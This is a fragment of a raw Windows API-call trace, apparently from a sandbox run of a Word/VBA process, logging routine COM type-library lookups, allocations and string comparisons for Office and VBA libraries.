ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xea, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xeb, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xec, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xed, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xee, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xef, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf2, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf3, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf6, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.321] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.321] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.321] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.321] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186468 | out: pVarVal=0x186468*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.321] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.321] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186460, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186370, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.321] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.321] CoCreateGuid (in: pguid=0x1868f0 | out: pguid=0x1868f0*(Data1=0x18a09345, Data2=0x33f7, Data3=0x4404, Data4=([0]=0xa4, [1]=0x3d, [2]=0x1b, [3]=0xc0, [4]=0x9, [5]=0xb8, [6]=0x73, [7]=0x8b))) returned 0x0 [0041.321] CoCreateGuid (in: pguid=0x1868f0 | out: pguid=0x1868f0*(Data1=0x48afecd8, Data2=0xad4b, Data3=0x4e1a, Data4=([0]=0x9a, [1]=0x1d, [2]=0xd7, [3]=0xba, [4]=0x7, [5]=0xe0, [6]=0x75, [7]=0x6c))) returned 0x0 [0041.321] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c32790 [0041.321] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.321] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.321] IUnknown:Release (This=0x6a861c0) returned 0x3 [0041.321] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.321] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.321] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f8b0 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d8e0 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0de20 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca5af0 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca5d40 [0041.322] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.322] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.322] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186a28 | out: ppvObject=0x186a28*=0x0) returned 0x80004002 [0041.322] IMalloc:Alloc (This=0x7feffc15380, cb=0x50) returned 0x6a677a0 [0041.322] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0041.322] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.322] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x185f58, pDummy=0x0 | out: ppTLibAttr=0x185f58, pDummy=0x0) returned 0x0 [0041.322] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x185f70, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x134100000000 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x134100000000) returned 0x0 [0041.322] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e63410 [0041.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x185fe0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0041.322] strcpy_s (in: _Dst=0x6a7e290, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0041.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x1860f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0041.322] strcpy_s (in: _Dst=0x6a7e2e0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0041.322] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e63860 [0041.322] IUnknown:AddRef (This=0x6990960) returned 0x5 [0041.323] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0041.323] IUnknown:Release (This=0x6990960) returned 0x4 [0041.323] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0041.323] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0041.323] IUnknown:AddRef (This=0x6992850) returned 0xa [0041.323] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x185f58, pDummy=0x0 | out: ppTLibAttr=0x185f58, pDummy=0x0) returned 0x0 [0041.323] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x185f70, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x185fe0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0041.323] strcpy_s (in: _Dst=0x6a7e350, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0041.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x1860f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0041.323] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca5f90 [0041.323] strcpy_s (in: _Dst=0x6ca5fb8, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0041.323] IUnknown:AddRef (This=0x6992850) returned 0xb [0041.323] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0041.323] IUnknown:Release (This=0x6992850) returned 0xa [0041.323] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0041.324] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0041.324] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0041.324] IUnknown:AddRef (This=0x6992df0) returned 0x5 [0041.324] ITypeLib:RemoteGetLibAttr (in: This=0x6992df0, ppTLibAttr=0x185f58, pDummy=0x0 | out: ppTLibAttr=0x185f58, pDummy=0x0) returned 0x0 [0041.324] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x185f70, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x185fe0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0041.324] strcpy_s (in: _Dst=0x6ca6028, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0041.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1860f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0041.324] strcpy_s (in: _Dst=0x6ca6050, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0041.324] IUnknown:AddRef (This=0x6992df0) returned 0x6 [0041.324] ITypeLib:LocalReleaseTLibAttr (This=0x6992df0) returned 0x0 [0041.324] IUnknown:Release (This=0x6992df0) returned 0x5 [0041.324] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0041.325] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0041.325] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0041.325] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0041.325] IUnknown:AddRef (This=0x6992580) returned 0x3 [0041.325] ITypeLib:RemoteGetLibAttr (in: This=0x6992580, ppTLibAttr=0x185f58, pDummy=0x0 | out: ppTLibAttr=0x185f58, pDummy=0x0) returned 0x0 [0041.325] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x185f70, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x185fe0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0041.325] strcpy_s (in: _Dst=0x6ca60c0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1860f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0041.325] strcpy_s (in: _Dst=0x6ca6108, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0041.325] IUnknown:AddRef (This=0x6992580) returned 0x4 [0041.325] ITypeLib:LocalReleaseTLibAttr (This=0x6992580) returned 0x0 [0041.325] IUnknown:Release (This=0x6992580) returned 0x3 [0041.326] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185ba0 | out: ppvObject=0x185ba0*=0x0) returned 0x80004002 [0041.326] IUnknown:AddRef (This=0x6a86110) returned 0x3 [0041.326] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x185bb8, pDummy=0x10 | out: ppTypeAttr=0x185bb8, pDummy=0x10) returned 0x0 [0041.326] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.326] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.326] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.326] IMalloc:Alloc (This=0x7feffc15380, cb=0x118) returned 0x3be8220 [0041.326] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca61e0 [0041.326] IMalloc:Alloc (This=0x7feffc15380, cb=0xe28) returned 0x6bc0cc0 [0041.326] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x185b98, pDummy=0x185bd4 | out: ppTypeAttr=0x185b98, pDummy=0x185bd4*=0xffffffff) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x0, ppFuncDesc=0x185b90, pDummy=0x185bd8 | out: ppFuncDesc=0x185b90, pDummy=0x185bd8*=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x1, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x2, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x3, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x4, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x5, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x6, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x7, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x8, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x9, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xa, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xb, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xc, ppFuncDesc=0x185b90, pDummy=0x100 | out: ppFuncDesc=0x185b90, pDummy=0x100) returned 0x0 [0041.326] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.326] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x185b98, pDummy=0x185bd4 | out: ppTypeAttr=0x185b98, pDummy=0x185bd4*=0xffffffff) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x0, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x1, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x2, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x3, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x4, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x5, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc 